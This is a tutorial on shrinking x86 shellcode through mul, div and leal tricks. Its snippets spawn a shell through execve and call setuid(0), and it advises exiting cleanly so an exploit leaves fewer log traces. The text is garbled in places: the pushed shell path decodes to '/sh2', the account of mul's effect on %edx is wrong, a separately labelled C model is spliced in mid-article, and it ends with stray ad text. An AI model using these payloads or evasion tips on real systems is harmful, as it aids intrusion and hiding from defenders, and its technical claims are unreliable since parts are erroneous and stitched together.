So, now comes the ever-important question: how can we use these attributes to our advantage when writing shellcode? Well, let’s think for a second. The instruction takes only one operand; therefore, since it is a very common instruction, it will generate only two bytes in our final shellcode. It multiplies whatever is passed to it by the value stored in %eax, and stores the value in both %edx and %eax, completely overwriting the contents of both registers, regardless of whether it is necessary to do so in order to store the result of the multiplication. Let’s put on our mathematician hats for a second and consider this: what is the only possible result of a multiplication by 0? The answer, as you may have guessed, is 0. I think it’s about time for some example code, so here it is:

xorl %ecx,%ecx
mul %ecx

What is this shellcode doing? Well, it 0’s out the %ecx register using the xor instruction, so we now know that %ecx is 0. Then it does a mul %ecx, which, as we just learned, multiplies its operand by the value in %eax and then proceeds to store the result of this multiplication in EDX:EAX. So, regardless of %eax’s previous contents, %eax must now be 0. However, that’s not all: %edx is 0’d now too, because, even though no overflow occurs, it still overwrites the %edx register with the sign bit (left-most bit) of %eax. Using this technique we can zero out three registers in only three bytes, whereas by any other method (that I know of) it would have taken at least six.

The div instruction

Div is very similar to mul, in that it takes only one operand and implicitly divides the operand by the value in %eax. Also, like mul, it stores the result of the divide in %eax. Again, we will require the mathematical side of our brains to figure out how we can take advantage of this instruction. But first, let’s think about what is normally stored in the %eax register. The %eax register holds the return value of functions and/or syscalls. Most syscalls that are used in shellcoding will return -1 (on failure) or a positive value of some kind; only rarely will they return 0 (though it does occur). So, if we know that after a syscall is performed %eax will have a non-zero value, and that the instruction divl %eax will divide %eax by itself and then store the result in %eax, we can say that executing the divl %eax instruction after a syscall will put the value 1 into %eax. So… how is this applicable to shellcoding? Well, there is another important thing that %eax is used for, and that is to pass the specific syscall that you would like to call to int $0x80. It just so happens that the syscall that corresponds to the value 1 is exit(). Now for an example:

xorl %ebx,%ebx
mul %ebx
push %edx
pushl $0x3268732f
pushl $0x6e69622f
mov %esp, %ebx
push %edx
push %ebx
mov %esp,%ecx
movb $0xb, %al # execve() syscall, doesn’t return at all unless it fails, in which case it returns -1
int $0x80

divl %eax # -1 / -1 = 1
int $0x80

Now we have a 3 byte exit function, whereas before it was 5 bytes. However, there is a catch: what if a syscall does return 0? Well, in the odd situation in which that could happen, you could do many different things, like inc %eax, dec %eax, not %eax, anything that will make %eax non-zero. Some people say that exits are not important in shellcode, because your code gets executed regardless of whether or not it exits cleanly. They are right too: if you really need to save 3 bytes to fit your shellcode in somewhere, the exit() isn’t worth keeping. However, when your code does finish, it will try to execute whatever was after your last instruction, which will most likely produce a SIGILL (illegal instruction), which is a rather odd error and will be logged by the system. So, an exit() simply adds an extra layer of stealth to your exploit, so that even if it fails or you can’t wipe all the logs, at least this part of your presence will be clear.

Unlocking the power of leal

The leal instruction is an often neglected instruction in shellcode, even though it is quite useful. Consider this short piece of shellcode.

xorl %ecx,%ecx
leal 0x11(%ecx),%eax   # 0x11 = 17, the value the text below describes

This will load the value 17 into eax and clear all of the extraneous bits of eax. This occurs because the leal instruction loads a variable of the type long into its destination operand. In its normal usage, this would load the address of a variable into a register, thus creating a pointer of sorts. However, since ecx is 0’d and 0+17=17, we load the value 17 into eax instead of any kind of actual address. In a normal shellcode we would do something like this to accomplish the same thing:

xorl %eax,%eax
movb $0x11,%al         # movb needs the 8-bit register %al, not %eax

I can hear you saying, but that shellcode is a byte shorter than the leal one, and you’re quite right. However, in a real shellcode you may already have to 0 out a register like ecx (or any other register), so the xorl instruction in the leal shellcode isn’t counted. Here’s an example:

xorl %eax,%eax
xorl %ebx,%ebx
movb $0x17,%al
int $0x80

xorl %ebx,%ebx
leal 0x17(%ebx),%eax   # leal needs a 32-bit destination, so %eax rather than %al
int $0x80

Both of these shellcodes call setuid(0), but one does it in 7 bytes while the other does it in 8. Again, I hear you saying, but that’s only one byte, it doesn’t make that much of a difference, and you’re right, here it doesn’t make much of a difference (except for in shellcode-size pissing contests =p), but when applied to much larger shellcodes, which have many function calls and need to do things like this frequently, it can save quite a bit of space.
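The register semantics that the mul, div and leal idioms above depend on, modelled in portable C as an added example (not code from the original paper). The regs_t struct and the function names are hypothetical, and the model covers only 32-bit unsigned mul/div and leal with an 8-bit displacement; it also shows the inputs for which divl %eax raises a divide error instead of leaving 1 in %eax.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Model of the four registers the idioms touch, plus a #DE fault flag. */
typedef struct { uint32_t eax, ebx, ecx, edx; bool fault; } regs_t;

/* mul r32: EDX:EAX = EAX * src, unsigned; EDX gets the high 32 bits. */
static void op_mul(regs_t *r, uint32_t src) {
    uint64_t p = (uint64_t)r->eax * src;
    r->eax = (uint32_t)p;
    r->edx = (uint32_t)(p >> 32);
}

/* div r32: EAX = EDX:EAX / src, EDX = remainder. A zero divisor or a
 * quotient that does not fit in 32 bits raises #DE (SIGFPE on Linux). */
static void op_div(regs_t *r, uint32_t src) {
    uint64_t n = ((uint64_t)r->edx << 32) | r->eax;
    if (src == 0 || n / src > UINT32_MAX) { r->fault = true; return; }
    r->eax = (uint32_t)(n / src);
    r->edx = (uint32_t)(n % src);
}

/* xorl %ecx,%ecx ; mul %ecx, starting from arbitrary EAX and EDX. */
regs_t zero_with_mul(uint32_t eax, uint32_t edx) {
    regs_t r = { eax, 0, 0xdeadbeefu, edx, false };
    r.ecx ^= r.ecx;
    op_mul(&r, r.ecx);
    return r;
}

/* divl %eax with the given EAX (e.g. a syscall return value) and EDX. */
regs_t div_by_self(uint32_t eax, uint32_t edx) {
    regs_t r = { eax, 0, 0, edx, false };
    op_div(&r, r.eax);
    return r;
}

/* xorl %ebx,%ebx ; leal 0x17(%ebx),%eax: address arithmetic only. */
regs_t lea_const(void) {
    regs_t r = { 0xffffffffu, 0x1234u, 0, 0, false };
    r.ebx ^= r.ebx;
    r.eax = r.ebx + 0x17;   /* base + disp8, no memory access */
    return r;
}

int main(void) {
    regs_t z = zero_with_mul(0x41414141u, 0x42424242u);
    printf("mul: eax=%u ecx=%u edx=%u\n", z.eax, z.ecx, z.edx);
    printf("div -1/-1: eax=%u\n", div_by_self(0xffffffffu, 0).eax);
    printf("div faults: eax=0 -> %d, edx=eax=5 -> %d\n",
           div_by_self(0, 0).fault, div_by_self(5, 5).fault);
    return 0;
}
```

When divl faults, Linux delivers SIGFPE to the process, so the crash is recorded under that signal.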

Conclusion

I hope you all learned something, and will go out and apply your knowledge to create smaller and better shellcodes. If you know who invented the leal technique, please tell me and I will credit him/her.

 
GPS Vehicle Tracking